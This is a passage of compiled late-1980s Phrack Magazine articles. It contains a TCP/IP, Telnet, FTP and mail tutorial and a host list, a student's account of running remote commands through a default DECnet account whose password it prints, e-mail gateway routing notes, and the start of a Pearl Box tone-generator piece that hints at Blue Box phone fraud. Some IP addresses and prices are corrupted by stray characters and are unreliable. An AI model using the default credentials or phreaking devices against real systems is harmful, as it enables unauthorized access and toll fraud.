them unambiguously. Host numbers are usually assigned by the organization that
manages the network, rather than one
central authority. Host numbers do not need to be unique throughout the whole
Internet but two hosts on the same network need to have unique host numbers.
The combination of the network number and the host number is called the IP
address of the host and is specified as a 32-bit binary number. All IP addresses
in the Internet are expressible as 32-bit
numbers, although they are often written in dotted decimal notation. Dotted
decimal notation breaks the 32-bit number into four eight-bit parts or octets
and each octet is specified as a decimal number.
For example, 00000001 is the binary octet that specifies the decimal number 1,
while 11000000 specifies 192. Dotted decimal notation makes IP addresses much
easier to read and remember.
Computers in the Internet are also identified by hostnames, which are strings of
characters, such as "phrackvax." However, IP packets must specify the 32-bit IP
address instead of the hostname so
some way to translating hostnames to IP addresses must exist.
One way is to have a table of hostnames and their corresponding IP addresses,
called a hosttable. Nearly every TCP/IP implementation has such a hosttable,
although the weaknesses of this method
are forcing a shift to a new scheme called the domain name system. In UNIX
systems, the hosttable is often called "/etc/hosts." You can usually read this
file and find out what the IP addresses of
various hosts are. Other systems may call this file by a different name and make
it unavailable for public viewing.
Users of computers are generally given accounts to which all charges for
computer use are billed. Even if computer time is free at an installation,
accounts are used to distinguish between the users and
enforce file protections. The generic term "username" will be used in this file
to refer to the name by which the computer account is accessed.
In the early days of the ARPAnet which was the first network to use the TCP/IP
protocols, computer users were identified by their username, followed by a
commercial "at" sign (@), followed by the
hostname on which the account existed. Networks were not given names, per se,
although the IP address specified a network number.
For example, "knight@phrackvax" referred to user "knight" on host "phrackvax."
This did not specify which network "phrackvax" was on, although that information
could be obtained by examining the
hosttable and the IP address for "phrackvax." (However, "phrackvax" is a
fictitious hostname used for this presentation.)
As time went on, every computer on the network had to have an entry in its
hosttable for every other computer on the network. When several networks linked
together to form the Internet, the
problem of maintaining this central hosttable got out of hand. Therefore, the
domain name scheme was introduced to split up the hosttable and make it smaller
and easier to maintain.
In the new domain name scheme, users are still identified by their usernames,
but hosts are now identified by their hostname and any and all domains of which
they are a part. For example, the address
"KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB".
However, host "UMCVMB" is a part of the domain "MISSOURI" " which is in turn
part of the
domain "EDU". There are other domains in "EDU", although only one is named
"MISSOURI". In the domain "MISSOURI", there is only one host named "UMCVMB".
However, other domains in "EDU" could theoretically have hosts named "UMCVMB"
(although I would say that this is rather unlikely in this example). Thus the
combination of hostname and all its
domains makes it unique. The method of translating such names into IP addresses
is no longer as straightforward as looking up the hostname in a table. Several
protocols and specialized network
software called nameservers and resolvers implement the domain name scheme.
Not all TCP/IP implementations support domain names because it is rather new. In
those cases, the local hosttable provides the only way to translate hostnames to
IP addresses. The system manager
of that computer will have to put an entry into the hosttable for every host
that users may want to connect to. In some cases, users may consult the
nameserver themselves to find out the IP address for
a given hostname and then use that IP address directly instead of a hostname.
I have selected a few network hosts to demonstrate how a host system can be
specified by both the hostname and host numerical address. Some of the nodes I
have selected are also nodes on
BITnet, perhaps even some of the others that I do not make a note of due a lack
of omniscient awareness about each and every single host system in the world :-)
Numerical BITnet Hostname Location
18.72.0.39 ATHENA.MIT.EDU Mass. Institute of Technology MIT
26.0.0.73 SRI-NIC.ARPA DDN Network Information Center -
36.21.0.13 MACBETH.STANFORD.EDU Stanford University ?
36.21.0.60 PORTIA.STANFORD.EDU Stanford University ?
128.2.11.131 ANDREW.CMU.EDU Carnegie Mellon Univ. ANDREW
128.3.254.13 LBL.GOV Lawrence Berkeley Labrotories LBL
128.6.4.7 RUTGERS.RUTGERS.EDU Rutgers University ?
128½9.99.1 CUCARD.MED.COLUMBIA.EDU Columbia University ?
128.102.18.3 AMES.ARC.NASA.GOV Ames Research Center [NASA] -
128.103.1.1 HARVARD.EDU Harvard University HARVARD
128.111.24.40 HUB.UCSB.EDU Univ. Of Santa Barbara ?
128.115.14.1 LLL-WINKEN.LLNL.GOV Lawrence Livermore Labratories -
128.143.2.7 UVAARPA.VIRGINIA.EDU University of Virginia ?
128.148.128.40 BROWNVM.BROWN.EDU Brown University BROWN
128.163.1½ UKCC.UKY.EDU University of Kentucky UKCC
128.183.10.4 NSSDCA.GSFC.NASA.GOV Goddard Space Flight Center [NASA]-
128.186.4.18 RAI.CC.FSU.EDU Florida State University FSU
128.206.1.1 UMCVMB.MISSOURI.EDU Univ. of MissouriColumbia UMCVMB
128.208.1.15 MAX.ACS.WASHINGTON.EDU University of Washington MAX
128.228.1.2 CUNYVM.CUNY.EDU City University of New York CUNYVM
129.10.1.6 NUHUB.ACS.NORTHEASTERN.EDU Northeastern University NUHUB
131.151.1.4 UMRVMA.UMR.EDU University of Missouri Rolla UMRVMA
192.9.9.1 SUN.COM Sun Microsystems, Inc. -
192.33.18.30 VM1.NODAK.EDU North Dakota State Univ. NDSUVM1
192.33.18½0 PLAINS.NODAK.EDU North Dakota State Univ. NDSUVAX
Please Note: Not every system on BITnet has an IP address. Likewise, not every
system that has an IP address is on BITnet. Also, while some locations like
Stanford University may have nodes on
BITnet and have hosts on the IP as well, this does not necessarily imply that
the systems on BITnet and on IP (the EDU domain in this case) are the same
systems.
Attempts to gain unauthorized access to systems on the internet are not
tolerated and is legally a federal offense. At some hosts, they take this very
seriously, especially the government hosts such as
NASA's Goddard Space Flight Center, where they do not mind telling you so at the
main prompt when you connect to their system.
However, some nodes are public access to an extent. The DDN Network Information
Center can be used by anyone. The server and database there have proven to be an
invaluable source of
information when locating people, systems, and other information that is related
to the Internet.
Telnet
Remote login refers to logging in to a remote computer from a terminal connected
to a local computer. Telnet is the standard protocol in the DOD Protocol Suite
for accomplishing this. The "rlogin"
program, provided with Berkeley UNIX systems and some other systems, also
enables remote login.
For purposes of discussion, the "local computer" is the computer to which your
terminal is directly connected while the "remote computer" is the computer on
the network to which you are
communicating and to which your terminal is *NOT* directly connected.
Since some computers use a different method of attaching terminals to computers,
a better definition would be the following: The "local computer" is the computer
that you are currently using and the
"remote computer" is the computer on the network with which you are or will be
communicating. Note that the terms "host" and "computer" are synonymous in the
following discussion.
To use Telnet, simply enter the command: TELNET
The prompt that Telnet gives is: Telnet>
(However, you can specify where you want to Telnet to immediately and bypass the
prompts and other delays by issuing the command: TELNET [location].)
There is help available by typing in ?. This prints a list of all the valid
subcommands that Telnet provides with a one-line explanation.
Telnet> ?
To connect to another computer, use the open subcommand to open a connection
to that computer. For example, to connect to the host "UMCVMB.MISSOURI.EDU",
do "open umcvmb.missouri.edu"
Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu" into an
IP address and will send a packet to that host requesting login. If the remote
host decides to let you attempt a login, it prompts you for your username and
password. If the host does not respond, Telnet will "time out" (i.e. Wait for a
reasonable amount of time such as 20
seconds) and then terminate with a message such as "Host not responding."
If your computer does not have an entry for a remote host in its hosttable and
it cannot resolve the name, you can use the IP address explicitly in the telnet
command. For example,
TELNET 26.0.0.73 (Note: This is the IP address for the DDN Network Information
Center [SRI-NIC.ARPA])
If you are successful in logging in, your terminal is connected to the remote
host. For all intents and purposes, your terminal is directly hard-wired to that
host and you should be able to do anything on
your remote terminal that you can do at any local terminal. There are a few
exceptions to this rule, however.
Telnet provides a network escape character, such as CONTROL-T. You can find out
what the escape character is by entering the "status" subcommand:
Telnet> status
You can change the escape character by entering the "escape" subcommand:
Telnet> escape
When you type in the escape character, the Telnet prompt returns to your screen
and you can enter subcommands. For example, to break the connection, which
usually logs you off the remote host,
enter the subcommand "quit":
Telnet> quit
Your Telnet connection usually breaks when you log off the remote host, so the
"quit" subcommand is not usually used to log off.
When you are logged in to a remote computer via Telnet, remember that there is a
time delay between your local computer and the remote one. This often becomes
apparent to users when scrolling a
long file across the terminal screen and they wish to cancel the scrolling by
typing CONTROL-C or something similar. After typing the special control
character, the scrolling continues. The special
control character takes a certain amount of time to reach the remote computer
which is still scrolling information. Thus response from the remote computer
will not likely be as quick as response from a
local computer. Once you are remotely logged on, the computer you are logged on
to effectively becomes your "local computer," even though your original "local
computer" still considers you logged
on. You can log on to a third computer which would then become your "local
computer" and so on. As you log out of each session, your previous session
becomes active again.
File Transfer
FTP is the program that allows files to be sent from one computer to another.
"FTP" stands for "File Transfer Protocol".
When you start using FTP, a communications channel with another computer on the
network is opened. For example, to start using FTP and initiate a file transfer
session with a computer on the
network called "UMCVMB", you would issue the following subcommand:
FTP UMCVMB.MISSOURI.EDU
Host "UMCVMB" will prompt you for an account name and password. If your login is
correct, FTP will tell you so, otherwise it will say "login incorrect." Try
again or abort the FTP program. (This is
usually done by typing a special control character such as CONTROL-C. The
"program abort" character varies from system to system.)
Next you will see the FTP prompt, which is:
Ftp>
There are a number of subcommands of FTP. The subcommand "?" will list these
commands and a brief description of each one.
You can initiate a file transfer in either direction with FTP, either from the
remote host or to the remote host. The "get" subcommand initiates a file
transfer from the remote host (i.e. Tells the remote
computer to send the file to the local computer [the one on which you issued the
"ftp" command]). Simply enter "get" and FTP will prompt you for the remote
host's file name and the (new) local host's
file name. Example:
Ftp> get
Remote file name?
theirfile
local file name?
myfile
You can abbreviate this by typing both file names on the same line as the "get"
subcommand. If you do not specify a local file name, the new local file will be
called the same thing as the remote file.
Valid FTP subcommands to get a file include the following:
get theirfile myfile
get doc.x25
The "put" subcommand works in a similar fashion and is used to send a file from
the local computer to the remote computer. Enter the command "put" and FTP will
prompt you for the local file name
and then the remote file name. If the transfer cannot be done because the file
doesn't exist or for some other reason, FTP will print an error message.
There are a number of other subcommands in FTP that allow you to do many more
things. Not all of these are standard so consult your local documentation or
type a question mark at the FTP prompt.
Some functions often built into FTP include the ability to look at files before
getting or putting them, the ability to change directories, the ability to
delete files on the remote computer, and the ability to
list the directory on the remote host.
An intriguing capability of many FTP implementations is "third party transfers."
For example, if you are logged on computer A and you want to cause computer B to
send a file to computer C, you can
use FTP to connect to computer B and use the "rmtsend" command. Of course, you
have to know usernames and passwords on all three computers, since FTP never
allows you to peek into
someone's directory and files unless you know their username and password.
The "cd" subcommand changes your working directory on the remote host. The "lcd"
subcommand changes the directory on the local host. For UNIX systems, the
meaning of these subcommands is
obvious. Other systems, especially those that do not have directory-structured
file system, may not implement these commands or may implement them in a
different manner.
The "dir" and "ls" subcommands do the same thing, namely list the files in the
working directory of the remote host.
The "list" subcommand shows the contents of a file without actually putting it
into a file on the local computer. This would be helpful if you just wanted to
inspect a file. You could interrupt it before it
reached the end of the file by typing CONTROL-C or some other special character.
This is dependent on your FTP implementation.
The "delete" command can delete files on the remote host. You can also make and
remove directories on the remote host with "mkdir" and "rmdir". The "status"
subcommand will tell you if you are
connected and with whom and what the state of all your options are.
If you are transferring binary files or files with any non-printable characters,
turn binary mode on by entering the "binary" subcommand:
binary
To resume non-binary transfers, enter the "ascii" subcommand.
Transferring a number of files can be done easily by using "mput" (multiple put)
and "mget" (multiple get). For example, to get every file in a particular
directory, first issue a "cd" command to change to
that directory and then a "mget" command with an asterisk to indicate every
file:
cd somedirectory
mget *
When you are done, use the "close" subcommand to break the communications link.
You will still be in FTP, so you must use the "bye" subcommand to exit FTP and
return to the command level. The
"quit" subcommand will close the connection and exit from FTP at the same time.
Mail
Mail is the simplest network facility to use in many ways. All you have to do is
to create your message, which can be done with a file editor or on the spur of
the moment, and then send it. Unlike FTP
and Telnet, you do not need to know the password of the username on the remote
computer. This is so because you cannot change or access the files of the remote
user nor can you use their account
to run programs. All you can do is to send a message.
There is probably a program on your local computer which does mail between users
on that computer. Such a program is called a mailer. This may or may not be the
way to send or receive mail from
other computers on the network, although integrated mailers are more and more
common. UNIX mailers will be used as an example in this discussion.
Note that the protocol which is used to send and receive mail over a TCP/IP
network is called SMTP, the "Simple Mail Transfer Protocol." Typically, you will
not use any program called SMTP, but
rather your local mail program.
UNIX mailers are usually used by invoking a program named "mail". To receive new
mail, simply type "mail". There are several varieties of UNIX mailers in
existence. Consult your local documentation
for details. For example, the command "man mail" prints out the manual pages for
the mail program on your computer.
To send mail, you usually specify the address of the recipient on the mail
command. For example: "mail knight@umcvmb.missouri.edu" will send the following
message to username "knight" on host
"umcvmb".
You can usually type in your message one line at a time, pressing RETURN after
each line and typing CONTROL-D to end the message. Other facilities to include
already-existing files sometimes exist.
For example, Berkeley UNIX's allow you to enter commands similar to the
following to include a file in your current mail message:
r myfile
In this example, the contents of "myfile" are inserted into the message at this
point.
Most UNIX systems allow you to send a file through the mail by using input
redirection. For example:
mail knight@umcvmb.missouri.edu < myfile
In this example, the contents of "myfile" are sent as a message to "knight" on
"umcvmb."
Note that in many UNIX systems the only distinction between mail bound for
another user on the same computer and another user on a remote computer is
simply the address specified. That is, there is
no hostname for local recipients. Otherwise, mail functions in exactly the same
way. This is common for integrated mail packages. The system knows whether to
send the mail locally or through the
network based on the address and the user is shielded from any other details.
"The Quest For Knowledge Is Without End..."
123.Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning
Prologue For None VMS Users
DECnet is the network for DEC machines, in most cases you can say VAX's. DECnet
allows you to do:
· e-mail
· file transfer
· remote login
· remote command
· remote job entry
· PHONE
PHONE is an interactive communication between users and is equal to TALK on UNIX
or a "deluxe"-CHAT on VM/CMS.
BELWUE, the university network of the state Baden-Wuerttemberg in West Germany
contains (besides other networks) a DECnet with about 400 VAX's. On every VAX
there is standard-account
called DECNET with pw:= DECNET, which is not reachable via remote login. This
account is provided for several DECnet-Utilities and as a pseudo-guest-account.
The DECNET-account has very
restricted privileges: You cannot edit a file or make another remote login.
The HELP is equipped by the system and is similar to the MAN command on UNIX.
More information on DECnet can be found in "Looking Around In DECnet" by Deep
Thought in this very issue of Phrack Inc.
Here, at the University of Ulm, we have an *incredibly* ignorant computer center
staff, with an even bigger lack of system-literature (besides the 80kg of
VAX/VMS-manuals). The active may search
for information by himself, which is over the level of "run," "FORTRAN," or
"logout." My good luck that I have other accounts in the BELWUE-DECnet, where
more information is offered for the
users. I am a regular student in Ulm and all my accounts are completely legal
and corresponding to the German laws. I don't call myself a "hacker," I feel
more like a "user" (...it's more a
defining-problem).
In the HELP-menu in a host in Tuebingen I found the file netdcl.com and the
corresponding explanation, which sends commands to the DECNET-Account of other
VAX's and executes them there
(remote command). The explanation in the HELP-menu was idiot-proof -- therefore
for me, too :-)
With the command "$ mcr ncp show known nodes" you can obtain a list of all
netwide active VAX's, as is generally known, and so I pinged all these VAX's to
look for more information for a
knowledge-thirsty user. With "help", "dir" and other similar commands I look
around on those DECnet accounts, always watching for topics related to the
BELWUE-network. It's a pity, that 2/3 of all
VAX's have locked the DECNET-Account for NETDCL.COM. Their system managers are
probably afraid of unauthorized access, but I cannot imagine how there could be
such an unauthorized
access, because you cannot log on this account -- no chance for trojan horses,
etc.
Some system managers called me back after I visited their VAX to chat with me
about the network and asked me if they could help me in any way. One sysop from
Stuttgart even sent me a version of
NETDCL.COM for the ULTRIX operation system.
Then, after a month, the HORROR came over me in shape of a the following mail:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From: TUEBINGEN::SYSTEM 31-MAY-1989 15:31:11.38
To: FRAMSTAG
CC:
Subj: don't make any crap, or you'll be kicked out!
From: ITTGPX::SYSTEM 29-MAY-1989 16:46
To: TUEBINGEN::SYSTEM
Subj: System-breaking-in 01-May-1989
To the system manager of the Computer TUEBINGEN,
On May 1st 1989 we had a System-breaking-in in our DECNET-account, which started
from your machine. By help of our accounting we ascertained your user FRAMSTAG
to have emulated an
interactive log-on on our backbone-node and on every machine of our VAX-cluster
with the "trojan horse" NETDCL.COM. Give us this user's name and address and
dear up the occurrence
completely. We point out that the user is punishable. In case of repetition we
would be forced to take corresponding measures. We will check whether our system
got injured. If not, this time we will
disregard any measure. Inform us via DECnet about your investigation results --
we are attainable by the nodenumber 1084::system
Dipl.-Ing. Michael Hager
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
My system manager threatened me with the deleting of my account, if I would not
immediately enlighten the affair. *Gulp*! I was conscious about my innocence,
but how to tell it to the others? I
explained, step by step, everything to my system manager. He then understood
after a while, but the criminal procedure still hovered over me... so, I took
quickly to my keyboard, to compose file of
explanations and to send it to that angry system manager in Stuttgart (node 1084
is an institute there). But no way out: He had run out of disk quota and my
explanation-mail sailed into the nirwana:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
$ mail explanation
To: 1084::system
%MAIL-E, error sending to user SYSTEM at 1084
%MAIL-E-OPENOUT, error opening
SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;
as output
-RMS-E-CRE, ACP file create failed
-SYSTEM-F-EXDISKQUOTA, disk quota exceeded
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
Also the attempt of a connection with the PHONE-facility failed: In his
borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with
the REAL-addresses of the virtual
DECnet-addresses available (to prevent hacking). Now I stood there with the
brand "DANGEROUS HACKER!" and I had no chance to vindicate myself. I poured out
my troubles to an
acquaintance of mine, who is a sysop in the computer-center in Freiburg. He
asked other sysops and managers thru the whole BELWUE-network until someone gave
him a telephone number after a
few days -- and that was the right one!
I phoned to this Hager and told him what I had done with his DECnet-account and
also what NOT. I wanted to know which crime I had committed. He promptly
canceled all of his reproaches, but
he did not excuse his defames incriminations. I entreated him to inform my
system manager in Tuebingen that I have done nothing illegal and to stop him
from erasing my account. This happens already
to a fellow student of mine (in this case, Hager was also guilty). He promised
me that he would officially cancel his reproaches.
After over a week this doesn't happen (I'm allowed to use my account further
on). In return for it, I received a new mail from Hager on another account of
mine:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From: 1084::HAGER 1-JUN-1989 12:51
To: 50180::STUD_11
Subj: System-breaking-in
On June 1st 1989 you have committed a system-breaking-in on at least one of our
VAX's. We were able to register this occurrence. We would be forced to take
further measure if you did not dear
up the occurrence completely until June 6th.
Of course the expenses involved would be imposed on you. Hence enlightenment
must be in your own interest.
We are attainable via DECnet-mail with the address 1084::HAGER or via following
address:
Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik
Dipl.-Ing. M. Hager Tel.: 0711/685-6109
Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
Pfaffenwaldring 9/10-1
7000 Stuttgart-80
M. Hager
M. Mrzyglod
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
This was the reaction of my attempt: "$ PHONE 1084::SYSTEM". I have not answered
to this mail. I AM SICK OF IT!
124. Phrack Magazine - Vol. 3, Issue 28 by Taran King
ACSNET
Australian Computer Science Network (ACSNET), also known as Oz, has its gateway
through the CSNET node munnari.oz.au and if you cannot directly mail to the
oz.au domain, try either
username%munnari.oz.au@UUNET.UU.NET or munnari! username@UUNET.UU.NET.
AT&T MAIL
AT&T Mail is a mailing service of AT&T, probably what you might call it's
MCI-Mail equivalent. It is available on the UUCP network as node name attmail
but I've had problems having mail get
through. Apparently, it does cost money to mail to this service and the
surrounding nodes are not willing to pick up the tab for the ingoing mail, or at
least, this has seemingly been the case thus far. I
believe, though, that perhaps routing to att!attmail!user would work.
AT&T recently announced six new X.400 interconnections between AT&T Mail and
electronic mail services in the US, Korea, Sweden, Australia, and Finland. In
the US, AT&T Mail is now
interconnected with Telenet Communications Corporation's service, Telemail,
allowing users of both services to exchange messages easily. With the addition
of these interconnections, the AT&T Mail
Gateway 400 Service allows AT&T Mail subscribers to exchange messages with users
of the following electronic messaging systems:
Company E-Mail Name Country
TeleDelta TeDe 400 Sweden
OTC MPS400 Australia
Telecom-Canada Envoy100 Canada
DACOM DACOM MHS Korea
P&T-Tele MailNet 400 Finland
Helsinki Telephone Co. ELISA Finland
Dialcom Dialcom USA
Telenet Telemail USA
KDD Messavia Japan
Transpac ATLAS400 France
The interconnections are based on the X.400 standard, a set of guidelines for
the format, delivery and receipt of electronic messages recommended by an
international standards committee the CCITT.
International X.400 messages incur a surcharge. They are:
To Canada:
Per note: $.05
Per message unit: $.10
To other international locations:
Per note: $.20
Per message unit: $½0
There is no surcharge for X.400 messages within the US The following are
contacts to speak with about mailing through these mentioned networks. Other
questions can be directed through AT&T
Mail's toll-free number, 1-800-624-5672.
MHS Gateway: mhs!atlas MHS Gateway: mhs!dacom
Administrator: Bernard Tardieu Administrator: Bob Nicholson
Transpac AT&T
Phone: 3399283203 Morristown, NJ 07960
Phone: +1 201 644 1838
MHS Gateway: mhs!dialcom MHS Gateway: mhs!elisa
Administrator: Mr. Laraman Administrator: Ulla
Karajalainen
Dialcom Nokia Data
South Plainfield, NJ 07080 Phone: 01135804371
Phone: +1 441 493 3843
MHS Gateway: mhs!envoy MHS Gateway: mhs!kdd
Administrator: Kin C. Ma Administrator: Shigeo Lwase
Telecom Canada Kokusai Denshin Denwa CO.
Phone: +1 613 567 7584 Phone: 8133477419
MHS Gateway: mhs!mailnet MHS Gateway: mhs!otc
Administrator: Kari Aakala Administrator: Gary W.
Krumbine
Gen Directorate Of Post & AT&T Information Systems
Phone: 35806921730 Lincroft, NJ 07738
Phone: +1 201 576 2658
MHS Gateway: mhs!telemail MHS Gateway: mhs
Administrator: Jim Kelsay Administrator: AT&T Mail MHS
GTE Telenet Comm Corp Gateway
Reston, VA 22096 AT&T
Phone: +1 703 689 6034 Lincroft, NJ 08838
Phone: +1 800 624 5672
CMR
Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a mail
relay service between the Internet and three commercial electronic mail systems:
US Sprint/Telenet, MCI-Mail, and
DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL).
An important note: The only requirement for using this mail gateway is that the
work conducted must be DARPA sponsored research and other approved government
business. Basically, this means
that unless you've got some government-related business, you're not supposed to
be using this gateway. Regardless, it would be very difficult for them to screen
everything that goes through their
gateway. Before I understood the requirements of this gateway, I was sending to
a user of MCI-Mail and was not contacted about any problems with that
communication. Unfortunately, I mistyped
the MCI-Mail address on one of the letters and that letter ended up getting read
by system administrators who then informed me that I was not to be using that
system, as well as the fact that they
would like to bill me for using it. That was an interesting thought on their
part anyway, but do note that using this service does incur charges.
The CMR mailbox address in each system corresponds to the label:
Telemail: [Intermail/USCISI]TELEMAIL/USA
MCI-Mail: Intermail or 107-8239
CompMail: Intermail or CMP0817
NSF-Mail: Intermail or NSF153
USDA-Mail: Intermail or AGS9999
Addressing examples for each e-mail system are as follows:
MCIMAIL:
123-4567 seven digit address
Everett T. Bowens person's name (must be unique!)
COMPMAIL:
CMP0123 three letters followed by three or four digits
S.Cooper initial, then "." and then last name
134:CMP0123 domain, then ":" and then combination system and
account number
NSFMAIL:
NSF0123 three letters followed by three or four digits
A.Phillips initial, then "." and then last name
157:NSF0123 domain, then ":" and then combination system and
account number
USDAMAIL:
AGS0123 three letters followed by three or four digits
P.Shifter initial, then "." and then last name
157:AGS0123 domain, then ":" and then combination system and
account number
TELEMAIL:
BARNOC user (directly on Telemail)
BARNOC/LODH user/organization (directly on Telemail)
[BARNOC/LODH]TELEMAIL/USA
[user/organization]system branch/country
The following are other Telenet system branches/countries that can be mailed to:
TELEMAIL/USA NASAMAIL/USA MAIL/USA TELEMEMO/AUSTRALIA
TELECOM/CANADA TOMMAIL/CHILE TMAILUK/GB ITALMAIL/ITALY
ATI/JAPAN PIPMAIL/ROC DGC/USA FAAMAIL/USA
GSFC/USA GTEMAIL/USA TM11/USA TNET.TELEMAIL/USA
USDA/USA
Note: OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to it,
the format would be [A.MAILBOX/OMNET]MAIL/USA. The following are available
subdivisions of OMNET:
AIR Atmospheric Sciences
EARTH Solid Earth Sciences
LIFE Life Sciences
OCEAN Ocean Sciences
POLAR Interdisciplinary Polar Studies
SPACE Space Science and Remote Sensing
The following is a list of DIALCOM systems available in the listed countries
with their domain and system numbers:
Service Name Country Domain Number System Number
Keylink-Dialcom Australia 60 07, 08, 09
Dialcom Canada 20 20, 21, 22, 23, 24
DPT Databooks Denmark 124 71
Telebox Finland 127 62
Telebox West Germany 30 15, 16
Dialcom Hong Kong 80 88, 89
Eirmail Ireland 100 74
Goldnet Israel 50 05, 06
Mastermail Italy 130 65, 67
Mastermail Italy 1 66, 68
Dialcom Japan 70 13, 14
Dialcom Korea 1 52
Telecom Gold Malta 100 75
Dialcom Mexico 1 52
Memocom Netherlands 124 27, 28, 29
Memocom Netherlands 1 55
Starnet New Zealand 64 01, 02
Dialcom Puerto Rico 58 25
Telebox Singapore 88 10, 11, 12
Dialcom Taiwan 1 52
Telecom Gold United Kingdom 100 01, 04, 17, 80-89
DIALCOM USA 1 29-34, 37, 38, 41-59, 61-63, 90-99
NOTE:
You can also mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV
instead of going through the CMR gateway to mail to NASAMAIL or GSFCMAIL.
For more information and instructions on how to use CMR, send a message to the
user support group at intermail-request@intermail.isi.edu (you'll get basically
what I've listed plus maybe a bit more).
Please read Chapter 3 of The Future Transcendent Saga (Limbo to Infinity) for
specifics on mailing to these destination mailing systems.
COMPUSERVE
CompuServe is well known for its games and conferences. It does, though, have
mailing capability. Now, they have developed their own Internet domain, called
COMPUSERVE.COM. It is relatively
new and mail can be routed through either TUT.CIS.OHIO-STATE.EDU or
NORTHWESTERN.ARPA.
Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
The CompuServe link appears to be a polled UUCP connection at the gateway
machine. It is actually managed via a set of shell scripts and a comm utility
called xcomm, which operates via command
scripts built on the fly by the shell scripts during analysis of what jobs exist
to go into and out of CompuServe.
CompuServe subscriber accounts of the form 7xxxx, yyyy can be addressed as
7xxxx.yyyy@compuserve.com. CompuServe employees can be addressed by their
usernames in the
csi.compuserve.com subdomain. CIS subscribers write mail to
">inet:user@host.domain" to mail to users on the Wide-Area Networks, where
">gateway:" is CompuServe's internal gateway access
syntax. The gateway generates fully-RFC-compliant headers.
To fully extrapolate -- from the CompuServe side, you would use their EasyPlex
mail system to send mail to someone in BITNET or the Internet. For example, to
send me mail at my Bitnet ID, you
would address it to:
INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
Or to my Internet ID:
INET:C488869@UMCVMB.MISSOURI.EDU
Now, if you have a BITNET to Internet userid, this is a silly thing to do, since
your connect time to CompuServe costs you money. However, you can use this
information to let people on CompuServe
contact YOU. CompuServe Customer Service says that there is no charge to either
receive or send a message to the Internet or BITNET.
DASNET
DASnet is a smaller network that connects to the Wide-Area Networks but charges
for their service. DASnet subscribers get charged for both mail to users on
other networks AND mail for them from
users of other networks. The following is a brief description of DASnet, some of
which was taken from their promotional text letter.
DASnet allows you to exchange electronic mail with people on more than 20
systems and networks that are interconnected with DASnet. One of the drawbacks,
though, is that, after being subscribed
to these services, you must then subscribe to DASnet, which is a separate cost.
Members of Wide-Area networks can subscribe to DASnet too. Some of the networks
and systems reachable through
DASnet include the following:
ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom,
EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet,
Portal
Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan),
Telex, TWICS (Japan), UNISON, UUCP, The WELL, and Domains (i.e. ".COM" and
".EDU" etc.). New
systems are added all of the time. As of the writing of this file, Connect,
GoverNET, MacNET, and The American Institute of Physics PI-MAIL are soon to be
connected.
You can get various accounts on DASnet including:
· Corporate Accounts -- If your organization wants more than one individual
subscription.
· Site Subscriptions -- If you want DASnet to link directly to your
organization's electronic mail system.
To send e-mail through DASnet, you send the message to the DASnet account on
your home system. You receive e-mail at your mailbox, as you do now. On the
Wide-Area Networks, you send mail
to XB.DAS@STANFORD.BITNET. On the Subject: line, you type the DASnet address in
brackets and then the username just outside of them. The real subject can be
expressed after the username
separated by a "!" (Example: Subject: [0756TK]randy!How's Phrack?).
The only disadvantage of using DASnet as opposed to Wide-Area networks is the
cost. Subscription costs as of 3/3/89 cost $4.75 per month or $5.75 per month
for hosts that are outside of the USA
You are also charged for each message that you send. If you are corresponding
with someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed to your
account.
The following is an abbreviated cost list for mailing to the different services
of DASnet:
PARTIAL List DASnet Cost DASnet Cost
of Services 1st 1000 Each Additional 1000
Linked by DASnet (e-mail) Characters Characters:
INET, MacNET, PeaceNet, NOTE: 20 lines
Unison, UUCP*, Domains, .21 .11 of text is app.
e.g. .COM, .EDU* 1000 characters.
Dialcom--Any "host" in US .36 .25
Dialcom--Hosts outside US .93 .83
EasyLink (From EasyLink) .21 .11
(To EasyLink) ½5 .23
US FAX (international avail.) .79 .37
GeoMail--Any "host" in US .21 .11
GeoMail--Hosts outside US .74 .63
MCI (from MCI) .21 .11
(to MCI) .78 .25
(Paper mail - USA) 2.31 .21
Telemail .36 .25
W.U. Telex--United States 1.79 1.63
(You can also send Telexes outside the US)
TWICS--Japan .89 .47
* The charges given here are to the gateway to the network. The DASnet user is
not charged for transmission on the network itself.
Subscribers to DASnet get a free DASnet Network Directory as well as a listing
in the directory, and the ability to order optional DASnet services like
auto-porting or DASnet Telex Service which
gives you your own Telex number and answerback for $8.40 a month at this time.
DASnet is a registered trademark of DA Systems, Inc.
DA Systems, Inc.
1503 E. Campbell Ave.
Campbell, CA 95008
408-559-7434
TELEX: 910 380-3530
The following two sections on PeaceNet and AppleLink are in association with
DASnet as this network is what is used to connect.
125. Phrack Magazine - Vol. 3, Issue 28 by Dispater
Introduction:
After reading the earlier renditions of schematics for the Pearl Box, I decided
that there was an easier and cheaper way of doing the same thing with an IC and
parts you probably have just laying
around the house.
What Is A Pearl Box and Why Do I Want One?
A Pearl Box is a tone generating device that is used to make a wide range of
single tones. Therefore, it would be very easy to modify this basic design to
make a Blue Box by making 2 Pearl Boxes and
joining them together in some fashion.
